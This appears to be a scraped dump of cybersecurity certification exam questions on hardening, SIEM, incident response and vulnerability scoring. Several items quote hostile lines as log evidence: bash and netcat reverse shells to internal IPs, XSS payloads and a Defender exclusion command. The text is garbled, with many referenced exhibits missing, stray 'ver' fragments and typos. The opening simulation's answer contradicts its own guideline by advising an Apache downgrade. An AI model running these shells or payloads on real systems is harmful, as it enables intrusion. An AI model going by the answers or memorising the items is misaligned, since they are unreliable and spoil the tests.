SIMULATION You are a cybersecurity analyst tasked with interpreting scan data from Company As servers You must verify the requirements are being met for all of the servers and recommend changes if you find they are not The company's hardening guidelines indicate the following • TLS 1 2 is the only version of TLS running. • Apache 2.4.18 or greater should be used. • Only default ports should be used. AppServ1: No changes are needed for this server. AppServ2: Disable or upgrade TLS 1.0 and TLS 1.1 to TLS 1.2 on this server to ensure secure encryption and communication between clients and the server. Update Apache from version 2.4.17 to version 2.4.18 or greater on this server to fix any potential vulnerabilities or bugs. AppServ3: Downgrade Apache from version 2.4.19 to version 2.4.18 or lower on this server to ensure compatibility and stability with the company’s applications and policies. Change the port number from 8080 to either port 80 (for HTTP) or port 443 (for HTTPS) on this server to follow the default port convention and avoid any confusion or conflicts with other services. AppServ4: Update Apache from version 2.4.16 to version 2.4.18 or greater on this server to fix any potential vulnerabilities or bugs. Change the port number from 8443 to either port 80 (for HTTP) or port 443 (for HTTPS) on this server to follow the default port convention and avoid any confusion or conflicts with other services.

HOTSPOT A security analyst performs various types of vulnerability scans. Review the vulnerability scan results to determine the type of scan that was executed and if a false positive occurred for each device.Instructions:Select the Results Generated drop-down option to determine if the results were generated from a credentialed scan, non-credentialed scan, or a compliance scan.For ONLY the credentialed and non-credentialed scans, evaluate the results for false positives and check the findings that display false positives. NOTE: If you would like to uncheck an option that is currently selected, click on the option a second time.Lastly, based on the vulnerability scan results, identify the type of Server by dragging the Server tothe results. The Linux Web Server, File-Print Server and Directory Server are draggable.If at any time you would like to bring back the initial state of the simulation, please select the Reset All button. When you have completed the simulation, please select the Done button to submit. Once the simulation is submitted, please select the Next button to continue. Critical (10.0) 13852 Microsoft Windows Tesk Scheduler Remote Overflow (841873). Critical (9.3) 08955 Ubuntu 5.04/ 5.10/ 6.06 LTS Buffer overrun in emscrpit before 1.6.4 (CVE-2008-4306). WARNING (1.0.1) System cryptopgraphy:Force strong key protection for user keys stored on the computer: Prompt the user each time a key first used.

You are a penetration tester who is reviewing the system hardening guidelines for a company. Hardening guidelines indicate the following. There must be one primary server or service per device. Only default port should be used Non- secure protocols should be disabled. The corporate internet presence should be placed in a protected subnet Instructions : Using the available tools, discover devices on the corporate network and the services running on these devices. You must determine ip address of each device The primary server or service each device The protocols that should be disabled based on the hardening guidelines. Ver en PDF.

HOTSPOT The developers recently deployed new code to three web servers. A daffy automated external device scan report shows server vulnerabilities that are failure items according to PCI DSS. If the venerability is not valid, the analyst must take the proper steps to get the scan clean. If the venerability is valid, the analyst must remediate the finding. After reviewing the information provided in the network diagram, select the STEP 2 tab to complete the simulation by selecting the correct Validation Result and Remediation Action for each server listed using the drop-down options. Ver PDF.

An organization was compromised, and the usernames and passwords of all em-ployees were leaked online. Which of the following best describes the remedia-tion that could reduce the impact of this situation?. Multifactor authentication. Password changes. System hardening. Password encryption.

An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed with a secure template. Which of the following is the best resource to ensure secure configuration?. CIS Benchmarks. PCI DSS. OWASP Top Ten. ISO 27001.

Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events occurring throughout the corporate environment without logging in to the servers individually?. Deploy a database to aggregate the logging. Configure the servers to forward logs to a SIEM. Share the log directory on each server to allow local access,. Automate the emailing of logs to the analysts.

Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a known-malicious IP address?. Join an information sharing and analysis center specific to the company's industry. Upload threat intelligence to the IPS in STIX/TAXII format. Add data enrichment for IPS in the ingestion pipleline. Review threat feeds after viewing the SIEM alert.

Which of the following best describes the process of requiring remediation of a known threat within a given time frame?. SLA. MOU. Best-effort patching. Organizational governance.

A systems administrator notices unfamiliar directory names on a production server. The administrator reviews the directory listings and files, and then concludes the server has been compromised. Which of the following steps should the administrator take next?. Inform the internal incident response team. Follow the company's incident response plan. Review the lessons learned for the best approach. Determine when the access started.

A software developer has been deploying web applications with common security risks to include insufficient logging capabilities. Which of the following actions would be most effective to reduce risks associated with the application development?. Perform static analyses using an integrated development environment. Deploy compensating controls into the environment. Implement server-side logging and automatic updates. Conduct regular code reviews using OWASP best practices.

A security audit for unsecured network services was conducted, and the following output was generated: Which of the following services should the security team investigate further? (Select two). 21. 22. 23. 636. 1723. 3389.

While reviewing web server logs, a security analyst found the following line: <IMG SRC=’vbscript:msgbox("test")’> Which of the following malicious activities was attempted?. Command injection. XML injection. Server-side request forgery. Cross-site scripting.

Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?. Log retention. Log rotation. Maximum log size. Threshold value.

Which of the following is described as a method of enforcing a security policy between cloud customers and cloud services?. CASB. DMARC. SIEM. PAM.

After completing a review of network activity. the threat hunting team discovers a device on the network that sends an outbound email via a mail client to a non-company email address daily at 10:00 p.m. Which of the following is potentially occurring?. Irregular peer-to-peer communication. Rogue device on the network. Abnormal OS process behavior. Data exfiltration.

Which of the following threat-modeling procedures is in the OWASP Web Security Testing Guide?. Review Of security requirements. Compliance checks. Decomposing the application. Security by design.

Which of the following is a reason why proper handling and reporting of existing evidence are important for the investigation and reporting phases of an incident response?. TO ensure the report is legally acceptable in case it needs to be presented in court. To present a lessons-learned analysis for the incident response team. To ensure the evidence can be used in a postmortem analysis. To prevent the possible loss of a data source for further root cause analysis.

A company's security team is updating a section of the reporting policy that pertains to inappropriate use of resources (e.g., an employee who installs cryptominers on workstations in the office). Besides the security team, which of the following groups should the issue be escalated to first in order to comply with industry best practices?. Help desk. Law enforcement. Legal department. Board member.

Which of the following best describes the reporting metric that should be utilized when measuring the degree to which a system, application, or user base is affected by an uptime availability outage?. Timeline. Evidence. Impact. Scope.

An organization enabled a SIEM rule to send an alert to a security analyst distribution list when ten failed logins occur within one minute. However, the control was unable to detect an attack with nine failed logins. Which of the following best represents what occurred?. False positive. True negative. False negative. True positive.

A cybersecurity team has witnessed numerous vulnerability events recently that have affected operating systems. The team decides to implement host-based IPS, firewalls, and two-factor authentication. Which of the following does this most likely describe?. System hardening. Hybrid network architecture. Continuous authorization. Secure access service edge.

A Chief Information Security Officer (CISO) is concerned that a specific threat actor who is known to target the company's business type may be able to breach the network and remain inside of it for an extended period of time.Which of the following techniques should be performed to meet the CISO's goals?. Vulnerability scanning. Adversary emulation. Passive discovery. Bug bounty.

While performing a dynamic analysis of a malicious file, a security analyst notices the memory address changes every time the process runs. Which of the following controls is most likely preventing the analyst from finding the proper memory address of the piece of malicious code?. Address space layout randomization. Data execution prevention. Stack canary. Code obfuscation.

An analyst wants to ensure that users only leverage web-based software that has been pre-approved by the organization. Which of the following should be deployed?. Blocklisting. Allowlisting. Graylisting. Webhooks.

Which of the following best describes the goal of a disaster recovery exercise as preparation for possible incidents?. TO provide metrics and test continuity controls. To verify the roles of the incident response team. To provide recommendations for handling vulnerabilities. To perform tests against implemented security controls.

A security analyst is reviewing the findings of the latest vulnerability report for a company's web application. The web application accepts files for a Bash script to be processed if the files match a given hash. The analyst is able to submit files to the system due to a hash collision. Which of the following should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and infrastructure?. Deploy a WAF to the front of the application. Replace the current MD5 with SHA-256. Deploy an antivirus application on the hosting system. Replace the MD5 with digital signatures.

A Chief Information Security Officer wants to map all the attack vectors that the company faces each day. Which of the following recommendations should the company align their security controls around?. OSSTMM. Diamond Model Of Intrusion Analysis. OWASP. MITRE ATT&CK.

Which of the following best describes the key elements of a successful information security program?. Business impact analysis, asset and change management, and security communication plan. Security policy implementation, assignment of roles and responsibilities, and information asset classification. Disaster recovery and business continuity planning, and the definition of access control requirements and human resource policies. Senior management organizational structure, message distribution standards, and procedures for the operation of security management systems.

An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed: Which of the following tuning recommendations should the security analyst share?. Set an Http Only flag to force communication by HTTPS. Block requests without an X-Frame-Options header. Configure an Access-Control-Allow-Origin header to authorized domains. Disable the cross-origin resource sharing header.

A company brings in a consultant to make improvements to its website. After the consultant leaves. a web developer notices unusual activity on the website and submits a suspicious file containing the following code to the security team: Which of the following did the consultant do?. Implanted a backdoor. Implemented privilege escalation. Implemented clickjacking. Patched the web server.

Which of the following makes STIX and OpenloC information readable by both humans and machines?. XML. URL. OVAL. TAXII.

An analyst is evaluating the following vulnerability report: Which of the following vulnerability report sections provides information about the level of impact on data confidentiality if a successful exploitation occurs?. Payloads. Metrics. Vulnerability. Profile.

Which of the following best describes the importance of implementing TAXII as part of a threat intelligence program?. It provides a structured way to gain information about insider threats. It proactively facilitates real-time information sharing between the public and private sectors. It exchanges messages in the most cost-effective way and requires little maintenance once implemented. It is a semi-automated solution to gather threat intellbgence about competitors in the same sector.

During a recent site survey. an analyst discovered a rogue wireless access point on the network.Which of the following actions should be taken first to protect the network while preserving evidence?. Run a packet sniffer to monitor traffic to and from the access point. Connect to the access point and examine its log files. Identify who is connected to the access point and attempt to find the attacker. Disconnect the access point from the network.

While a security analyst for an organization was reviewing logs from web servers. the analyst found several successful attempts to downgrade HTTPS sessions to use cipher modes of operation susceptible to padding oracle attacks. Which of the following combinations of configuration changes should the organization make to remediate this issue? (Select two). Configure the server to prefer TLS 1.3. Remove cipher suites that use CBC. Configure the server to prefer ephemeral modes for key exchange. Require client browsers to present a user certificate for mutual authentication. Configure the server to require HSTS. Remove cipher suites that use GCM.

An analyst views the following log entries: The organization has a partner vendor with hosts in the 216.122.5.x range. This partner vendor is required to have access to monthly reports and is the only external vendor with authorized access.The organization prioritizes incident investigation according to the following hierarchy: unauthorized data disclosure is more critical than denial of service attempts.Which are more important than ensuring vendor data access.Based on the log files and the organization's priorities, which of the following hosts warrants additional investigation?. 121.19.30.221. 134.17.188.5. 202.180.1582. 216.122.5.5.

An analyst is conducting monitoring against an authorized team that win perform adversarial techniques. The analyst interacts with the team twice per day to set the stage for the techniques to be used. Which of the following teams is the analyst a member of?. Orange team. Blue team. Red team. Purple team.

An employee is no longer able to log in to an account after updating a browser. The employee usually has several tabs open in the browser. Which of the following attacks was most likely performed?. RFI. LFI. CSRF. XSS.

The Chief Executive Officer (CEO) has notified that a confidential trade secret has been compromised. Which of the following communication plans should the CEO initiate?. Alert department managers to speak privately with affected staff. Schedule a press release to inform other service provider customers of the compromise. Disclose to all affected parties in the Chief Operating Officer for discussion and resolution. Verify legal notification requirements of PII and SPII in the legal and human resource departments.

During an incident, analysts need to rapidly investigate by the investigation and leadership teams.Which of the following best describes how PII should be safeguarded during an incident?. Implement data encryption and close the data so only the company has access. Ensure permissions are limited in the investigation team and encrypt the data. Implement data encryption and create a standardized procedure for deleting data that is no longer needed. Ensure that permissions are open only to the company.

A security analyst is reviewing the logs of a web server and notices that an attacker has attempted to exploit a SQL injection vulnerability. Which of the following tools can the analyst use to analyze the attack and prevent future attacks?. A web application firewall. A network intrusion detection system. A vulnerability scanner. A web proxy.

Which Of the following techniques would be best to provide the necessary assurance for embedded software that drives centrifugal pumps at a power Plant?. Containerization. Manual code reviews. Static and dynamic analysis. Formal methods.

A security team identified several rogue Wi-Fi access points during the most recent network scan.The network scans occur once per quarter. Which of the following controls would best all ow the organization to identity rogue devices more quickly?. Implement a continuous monitoring policy. Implement a BYOD policy. Implement a portable wireless scanning policy. Change the frequency of network scans to once per month.

An analyst needs to provide recommendations based on a recent vulnerability scan: Which of the following should the analyst recommend addressing to ensure potential vulnerabilities are identified?. SMB use domain SID to enumerate users. SYN scanner. SSL certificate cannot be trusted. Scan not performed with admin privileges.

A security analyst recently used Arachni to perform a vulnerability assessment of a newly developed web application. The analyst is concerned about the following output: [+] XSS: In form input 'txtSearch' with action https://localhost/search.aspx [-] XSS: Analyzing response #1... [-] XSS: Analyzing response #2... [-] XSS: Analyzing response #3... [+] XSS: Response is tainted. Looking for proof of the vulnerability. Which of the following is the most likely reason for this vulnerability?. The developer set input validation protection on the specific field of search.aspx. The developer did not set proper cross-site scripting protections in the header. The developer did not implement default protections in the web application build. The developer did not set proper cross-site request forgery protections.

security analyst found the following vulnerability on the company’s website: <INPUT TYPE=“IMAGE” SRC=“javascript:alert(‘test’);”> Which of the following should be implemented to prevent this type of attack in the future?. Input sanitization. Output encoding. Code obfuscation. Prepared statements.

A cryptocurrency service company is primarily concerned with ensuring the accuracy of the data on one of its systems. A security analyst has been tasked with prioritizing vulnerabilities for remediation for the system. The analyst will use the following CVSSv3.1 impact metrics for prioritization: Which of the following vulnerabilities should be prioritized for remediation?. 1. 2. 3. 4.

A security analyst needs to mitigate a known, exploited vulnerability related not tack vector that embeds software through the USB interface. Which of the following should the analyst do first?. Conduct security awareness training on the risks of using unknown and unencrypted USBs. Write a removable media policy that explains that USBs cannot be connected to a company asset. Check configurations to determine whether USB ports are enabled on company assets. Review logs to see whether this exploitable vulnerability has already impacted the company.

A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to minimize the number of unique firewall rules. Which of the following scanning techniques would be most efficient to achieve the objective?. Deploy agents on all systems to perform the scans. Deploy a central scanner and perform non-credentialed scans. Deploy a cloud-based scanner and perform a network scan. Deploy a scanner sensor on every segment and perform credentialed scans.

A security analyst identified the following suspicious entry on the host-based IDS logs: bash -i >& /dev/tcp/10.1.2.3/8080 0>&1 Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?. #!/bin/bash nc 10.1.2.3 8080 -vv >dev/null && echo "Malicious activity" Il echo "OK". #!/bin/bash ps -fea | grep 8080 >dev/null && echo "Malicious activity" I| echo "OK". #!/bin/bash ls /opt/tcp/10.1.2.3/8080 >dev/null && echo "Malicious activity" I| echo "OK". #!/bin/bash netstat -antp Igrep 8080 >dev/null && echo "Malicious activity" I| echo "OK".

Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known sources?. Hacktivist threat. Advanced persistent threat. Unintentional insider threat. Nation-state threat.

A company has the following security requirements: . No public IPs · All data secured at rest . No insecure ports/protocols After a cloud scan is completed, a security analyst receives reports that several misconfigurations are putting the company at risk. Given the following cloud scanner output: Which of the following should the analyst recommend be updated first to meet the security requirements and reduce risks?. VM_PRD_DB. VM_DEV_DB. VM_DEV_Web02. VM_PRD_Web01.

A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constraints of the current sprint, only three can be remediated. Which of the following represents the least impactful risk, given the CVSS3.1 base scores?. AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L - Base Score 6.0. AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:L/A:L - Base Score 7.2. AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H - Base Score 6.4. AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L - Base Score 6.5.

Which of the following should be updated after a lessons-learned review?. Disaster recovery plan. Business continuity plan. Tabletop exercise. Incident response plan.

An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited time and resources. Which of the following best describes the threat actor attributed to the malicious activity?. Insider threat. Ransomware group. Nation-state. Organized crime.

A disgruntled open-source developer has decided to sabotage a code repository with a logic bomb that will act as a wiper. Which of the following parts of the Cyber Kill Chain does this act exhibit?. Reconnaissance. Weaponization. Exploitation. Installation.

Following an incident, a security analyst needs to create a script for downloading the configuration of all assets from the cloud tenancy. Which of the following authentication methods should the analyst use?. MFA. User and password. PAM. Key pair.

A security analyst detected the following suspicious activity: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f Which of the following most likely describes the activity?. Network pivoting. Host scanning. Privilege escalation. Reverse shell.

Which of the following can be used to learn more about TTPs used by cybercriminals?. ZenMAP. MITRE ATT&CK. National Institute of Standards and Technology. theHarvester.

After updating the email client to the latest patch, only about 15% of the workforce is able to use email. Windows 10 users do not experience issues, but Windows 11 users have constant issues. Which of the following did the change management team fail to do?. Implementation. Testing. Rollback. Validation.

The management team requests monthly KPI reports on the company's cybersecurity program. Which of the following KPIs would identify how long a security threat goes unnoticed in the environment?. Employee turnover. Intrusion attempts. Mean time to detect. Level of preparedness.

An incident response analyst is investigating the root cause of a recent malware outbreak. Initial binary analysis indicates that this malware disables host security services and performs cleanup routines on it infected hosts, including deletion of initial dropper and removal of event log entries and prefetch files from the host. Which of the following data sources would most likely reveal evidence of the root cause? (Select two). Creation time of dropper. Registry artifacts. EDR data. Prefetch files. File system metada. Sysmon event log.

During an incident, some loCs of possible ransomware contamination were found in a group of servers in a segment of the network. Which of the following steps should be taken next?. Isolation. Remediation. Reimaging. Preservation.

When investigating a potentially compromised host, an analyst observes that the process BGInfo.exe (PID 1024), a Sysinternals tool used to create desktop backgrounds containing host details, has been running for over two days. Which of the following activities will provide the best insight into this potentially malicious process, based on the anomalous behavior?. Changes to system environment variables. SMB network traffic related to the system process. Recent browser history of the primary user. Activities taken by PID 1024.

A vulnerability scan of a web server that is exposed to the internet was recently completed. A security analyst is reviewing the resulting vector strings: Vulnerability 1: CVSS: 3.0/AV:N/AC: L/PR: N/UI : N/S: U/C: H/I : L/A:L Vulnerability 2: CVSS: 3.0/AV: L/AC: H/PR:N/UI : N/S: U/C: L/I : L/A: H Vulnerability 3: CVSS: 3.0/AV:A/AC: H/PR: L/UI : R/S: U/C: L/I : H/A:L Vulnerability 4: CVSS: 3.0/AV: P/AC: L/PR: H/UI : N/S: U/C: H/I:N/A:L. Vulnerability 1. Vulnerability 2. Vulnerability 3. Vulnerability 4.

A Chief Information Security Officer (CISO) wants to disable a functionality on a business-critical web application that is vulnerable to RCE in order to maintain the minimum risk level with minimal increased cost. Which of the following risk treatments best describes what the CISO is looking for?. Transfer. Mitigate. Accept. Avoid.

ver. ver. ver.

Which of the following is a nation-state actor least likely to be concerned with?. Detection by MITRE ATT&CK framework. Detection or prevention of reconnaissance activities. Examination of its actions and objectives. Forensic analysis for legal action of the actions taken.

Which of the following most accurately describes the Cyber Kill Chain methodology?. It is used to correlate events to ascertain the TTPs of an attacker. It is used to ascertain lateral movements of an attacker, enabling the process to be stopped. It provides a clear model of how an attacker generally operates during an intrusion and the actions to take at each stage. It outlines a clear path for determining the relationships between the attacker, the technology used, and the target.

An analyst discovers unusual outbound connections to an IP that was previously blocked at the web proxy and firewall. Upon further investigation, it appears that the proxy and firewall rules that were in place were removed by a service account that is not recognized. Which of the following parts of the Cyber Kill Chain does this describe?. Delivery. Command and control. Reconnaissance. Weaporization.

A SOC manager is establishing a reporting process to manage vulnerabilities. Which of the following would be the best solution to identify potential loss incurred by an issue?. Trends. Risk score. Mitigation. Prioritization.

Which of the following is a benefit of the Diamond Model of Intrusion Analysis?. It provides analytical pivoting and identifies knowledge gaps. It guarantees that the discovered vulnerability will not be exploited again in the future. It provides concise evidence that can be used in court. It allows for proactive detection and analysis of attack events.

A SIEM alert is triggered based on execution of a suspicious one-liner on two workstations in the organization's environment. An analyst views the details of these events below: Which of the following statements best describes the intent of the attacker, based on this one-liner?. Attacker is escalating privileges via JavaScript. Attacker is utilizing custom malware to download an additional script. Attacker is executing PowerShell script "AccessToken.psr. Attacker is attempting to install persistence mechanisms on the target machine.

A security analyst detects an email server that had been compromised in the internal network. Users have been reporting strange messages in their email inboxes and unusual network traffic. Which of the following incident response steps should be performed next?. Preparation. Validation. Containment. Eradication.

While reviewing web server logs, a security analyst discovers the following suspicious line: Which of the following is being attempted?. Remote file inclusion. Command injection. Server-side request forgery. Reverse shell.

A payroll department employee was the target of a phishing attack in which an attacker impersonated a department director and requested that direct deposit information be updated to a new account. Afterward, a deposit was made into the unauthorized account. Which of the following is one of the first actions the incident response team should take when they receive notification of the attack?. Scan the employee's computer with virus and malware tools. Review the actions taken by the employee and the email related to the event. Contact human resources and recommend the termination of the employee. Assign security awareness training to the employee involved in the incident.

Which of the following is the most important reason for an incident response team to develop a formal incident declaration?. To require that an incident be reported through the proper channels. To identify and document staff who have the authority to declare an incident. To allow for public disclosure of a security event impacting the organization. To establish the department that is responsible for responding to an incident.

A security manager is looking at a third-party vulnerability metric (SMITTEN) to improve upon the company's current method that relies on CVSSv3. Given the following: Which of the following vulnerabilities should be prioritized?. Vulnerability 1. Vulnerability 2. Vulnerability 3. Vulnerability 4.

A small company does no! have enough staff to effectively segregate duties to prevent error and fraud in payroll management. The Chief Information Security Officer (CISO) decides to maintain and review logs and audit trails to mitigate risk. Which of the following did the CISO implement?. Corrective controls. Compensating controls. Operational controls. Administrative controls.

Following a recent security incident, the Chief Information Security Officer is concerned with improving visibility and reporting of malicious actors in the environment. The goal is to reduce the time to prevent lateral movement and potential data exfiltration. Which of the following techniques will best achieve the improvement?. Mean time to detect. Mean time to respond. Mean time to remediate. Service-level agreement uptime.

Due to an incident involving company devices, an incident responder needs to take a mobile phone to the lab for further investigation. Which of the following tools should be used to maintain the integrity of the mobile phone while it is transported? (Select two). Signal-shielded bag. Tamper-evident seal. Thumb drive. Crime scene tape. Write blocker. Drive duplicator.

A security analyst is working on a server patch management policy that will allow the infrastructure team to be informed more quickly about new patches. Which of the following would most likely be required by the infrastructure team so that vulnerabilities can be remediated quickly? (Select two). Hostname. Missing KPI. CVE details. POC availability. loCs. npm identifier.

An analyst is suddenly unable to enrich data from the firewall. However, the other open intelligence feeds continue to work. Which of the following is the most likely reason the firewall feed stopped working?. The firewall service account was locked out. The firewall was using a paid feed. The firewall certificate expired. The firewall failed open.

A security analyst noticed the following entry on a web server log: Warning: fopen (http://127.0.0.1:16) : failed to open stream: Connection refused in /hj/var/www/showimage.php on line 7 Which of the following malicious activities was most likely attempted?. XSS. CSRF. SSRF. RCE.

A SOC analyst is analyzing traffic on a network and notices an unauthorized scan. Which of the following types of activities is being observed?. Potential precursor to an attack. Unauthorized peer-to-peer communication. Rogue device on the network. System updates.

An analyst is evaluating a vulnerability management dashboard. The analyst sees that a previously remediated vulnerability has reappeared on a database server. Which of the following is the most likely cause?. The finding is a false positive and should be ignored. A rollback had been executed on the instance. The vulnerability scanner was configured without credentials. The vulnerability management software needs to be updated.

A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning project: . Must use minimal network bandwidth . Must use minimal host resources . Must provide accurate, near real-time updates . Must not have any stored credentials in configuration on the scanner Which of the following vulnerability scanning methods should be used to best meet these requirements?. Internal. Agent. Active. Uncredentialed.

A vulnerability management team found four major vulnerabilities during an assessment and needs to provide a report for the proper prioritization for further mitigation. Which of the following vulnerabilities should have the highest priority for the mitigation process?. A vulnerability that has related threats and loCs, targeting a different industry. A vulnerability that is related to a specific adversary campaign, with loCs found in the SIEM. A vulnerability that has no adversaries using it or associated loCs. A vulnerability that is related to an isolated system, with no loCs.

A security analyst is reviewing events that occurred during a possible compromise. The analyst obtains the following log: Which of the following is most likely occurring, based on the events in the log?. An adversary is attempting to find the shortest path of compromise. An adversary is performing a vulnerability scan. An adversary is escalating privileges. An adversary is performing a password stuffing attack.

AXSS vulnerability was reported on one of the non-sensitive/non-mission-critical public websites of a company. The security department confirmed the finding and needs to provide a recommendation to the application owner. Which of the following recommendations will best prevent this vulnerability from being exploited? (Select two). Implement an IPS in front of the web server. Enable MFA on the website. Take the website offline until it is patched. Implement a compensating control in the source code. Configure TLS v1.3 on the website. Fix the vulnerability using a virtual patch at the WAF.

Which of the following techniques can help a SOC team to reduce the number of alerts related to the internal security activities that the analysts have to triage?. Enrich the SIEM-ingested data to include all data required for triage. Schedule a task to disable alerting when vulnerability scans are executing. Filter all alarms in the SIEM with low severity. Add a SOAR rule to drop irrelevant and duplicated notifications.

An organization has tracked several incidents that are listed in the following table: Which of the following is the organization's MTTD?. 140. 150. 160. 180.

Which of the following does "federation" most likely refer to within the context of identity and access management?. Facilitating groups of users in a similar function or profile to system access that requires elevated or conditional access. An authentication mechanism that allows a user to utilize one set of credentials to access multiple domains. Utilizing a combination of what you know, who you are, and what you have to grant authentication to a user. Correlating one's identity with the attributes and associated applications the user has access to.

During an incident involving phishing, a security analyst needs to find the source of the malicious email. Which of the following techniques would provide the analyst with this information?. Header analysis. Packet capture. SSL inspection. Reverse engineering.

A security analyst needs to provide evidence of regular vulnerability scanning on the company's network for an auditing process. Which of the following is an example of a tool that can produce such evidence?. OpenVAS. Burp Suite. Nmap. Wireshark.

An employee downloads a freeware program to change the desktop to the classic look of legacy Windows. Shortly after the employee installs the program, a high volume of random DNS queries begin to originate from the system. An investigation on the system reveals the following: Add-MpPreference -ExclusionPath '%Program Filest\ksysconfig' Which of the following is possibly occurring?. Persistence. Privilege escalation. Credential harvesting. Defense evasion.

A cybersecurity analyst has recovered a recently compromised server to its previous state. Which of the following should the analyst perform next?. Eradication. Isolation. Reporting. Forensic analysis.

Which of following would best mitigate the effects of a new ransomware attack that was not properly stopped by the company antivirus?. Install a firewall. Implement vulnerability management. Deploy sandboxing. Update the application blocklist.

During an internal code review, software called "ACE" was discovered to have a vulnerability that allows the execution of arbitrary code. The vulnerability is in a legacy, third-party vendor resource that is used by the ACE software. ACE is used worldwide and is essential for many businesses in this industry. Developers informed the Chief Information Security Officer that removal of the vulnerability will take time. Which of the following is the first action to take?. Look for potential loCs in the company. Inform customers of the vulnerability. Remove the affected vendor resource from the ACE software. Develop a compensating control until the issue can be fixed permanently.

Which of the following statements best describes the MITRE ATT&CK framework?. It provides a comprehensive method to test the security of applications. It provides threat intelligence sharing and development of action and mitigation strategies. It helps identify and stop enemy activity by highlighting the areas where an attacker functions. It tracks and understands threats and is an open-source project that evolves. It breaks down intrusions into a clearly defined sequence of phases.

Which of the following entities should an incident manager work with to ensure correct processes are adhered to when communicating incident reporting to the general public, as a best practice?(Select two). Law enforcement. Governance. Legal. Manager. Public relations. Human resources.

A security analyst observed the following activity from a privileged account: . Accessing emails and sensitive information . Audit logs being modified . Abnormal log-in times Which of the following best describes the observed activity?. Irregular peer-to-peer communication. Unauthorized privileges. Rogue devices on the network. Insider attack.

A penetration tester submitted data to a form in a web application, which enabled the penetration tester to retrieve user credentials. Which of the following should be recommended for remediation of this application vulnerability?. Implementing multifactor authentication on the server OS. Hashing user passwords on the web application. Performing input validation before allowing submission. Segmenting the network between the users and the web server.

During a security test, a security analyst found a critical application with a buffer overflow vulnerability. Which of the following would be best to mitigate the vulnerability at the application level?. Perform OS hardening. Implement input validation. Update third-party dependencies. Configure address space layout randomization.

An organization discovered a data breach that resulted in Pll being released to the public. During the lessons learned review, the panel identified discrepancies regarding who was responsible for external reporting, as well as the timing requirements. Which of the following actions would best address the reporting issue?. Creating a playbook denoting specific SLAs and containment actions per incident type. Researching federal laws, regulatory compliance requirements, and organizational policies to document specific reporting SLAs. Defining which security incidents require external notifications and incident reporting in addition to internal stakeholders. Designating specific roles and responsibilities within the security team and stakeholders to streamline tasks.

Which of the following would an organization use to develop a business continuity plan?. A diagram of all systems and interdependent applications. A repository for all the software used by the organization. A prioritized list of critical systems defined by executive leadership. A configuration management database in print at an off-site location.

A security analyst reviews the following results of a Nikto scan: Which of the following should the security administrator investigate next?. tiki. phpList. shtml.exe. sshome.

A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes. Which of the following is the most likely scenario occurring with the time stamps?. The NTP server is not configured on the host. The cybersecurity analyst is looking at the wrong information. The firewall is using UTC time. The host with the logs is offline.

Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies regarding versions and patches in the existing infrastructure are discovered. Which of the following is the best solution to decrease the inconsistencies?. Implementing credentialed scanning. Changing from a passive to an active scanning approach. Implementing a central place to manage IT assets. Performing agentless scanning.

While configuring a SIEM for an organization, a security analyst is having difficulty correlating incidents across different systems. Which of the following should be checked first?. If appropriate logging levels are set. NTP configuration on each system. Behavioral correlation settings. Data normalization rules.

An analyst is conducting routine vulnerability assessments on the company infrastructure. When performing these scans, a business-critical server crashes, and the cause is traced back to the vulnerability scanner. Which of the following is the cause of this issue?. The scanner is running without an agent installed. The scanner is running in active mode. The scanner is segmented improperly. The scanner is configured with a scanning window.

An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline. Which of the following should the analyst focus on in order to move the incident forward?. Impact. Vulnerability score. Mean time to detect. Isolation.

A security team is concerned about recent Layer 4 DDoS attacks against the company website. Which of the following controls would best mitigate the attacks?. Block the attacks using firewall rules. Deploy an IPS in the perimeter network. Roll out a CDN. Implement a load balancer.

Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrence?. Risk register. Vulnerability assessment. Penetration test. Compliance report.

A security analyst has found a moderate-risk item in an organization's point-of-sale application. The organization is currently in a change freeze window and has decided that the risk is not high enough to correct at this time. Which of the following inhibitors to remediation does this scenario illustrate?. Service-level agreement. Business process interruption. Degrading functionality. Proprietary system.

A company has a primary control in place to restrict access to a sensitive database. However, the company discovered an authentication vulnerability that could bypass this control. Which of the following is the best compensating control?. Running regular penetration tests to identify and address new vulnerabilities. Conducting regular security awareness training of employees to prevent social engineering attacks. Deploying an additional layer of access controls to verify authorized individuals. Implementing intrusion detection software to alert security teams of unauthorized access attempts.

A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat. Which of the following is the best solution to secure the network?. Implement segmentation with ACLs. Configure logging and monitoring to the SIEM. Deploy MFA to cloud storage locations. Roll out an IDS.

A security analyst reviews the following Arachni scan results for a web application that stores PII data: Which of the following should be remediated first?. SQL injection. RFI. XSS. Code injection.

A systems administrator receives reports of an internet-accessible Linux server that is running very sluggishly. The administrator examines the server, sees a high amount of memory utilization, and suspects a DoS attack related to half-open TCP sessions consuming memory. Which of the following tools would best help to prove whether this server was experiencing this behavior?. Nmap. TCPDump. SIEM. EDR.

An organization is conducting a pilot deployment of an e-commerce application. The application's source code is not available. Which of the following strategies should an analyst recommend to evaluate the security of the software?. Static testing. Vulnerability testing. Dynamic testing. Penetration testing.

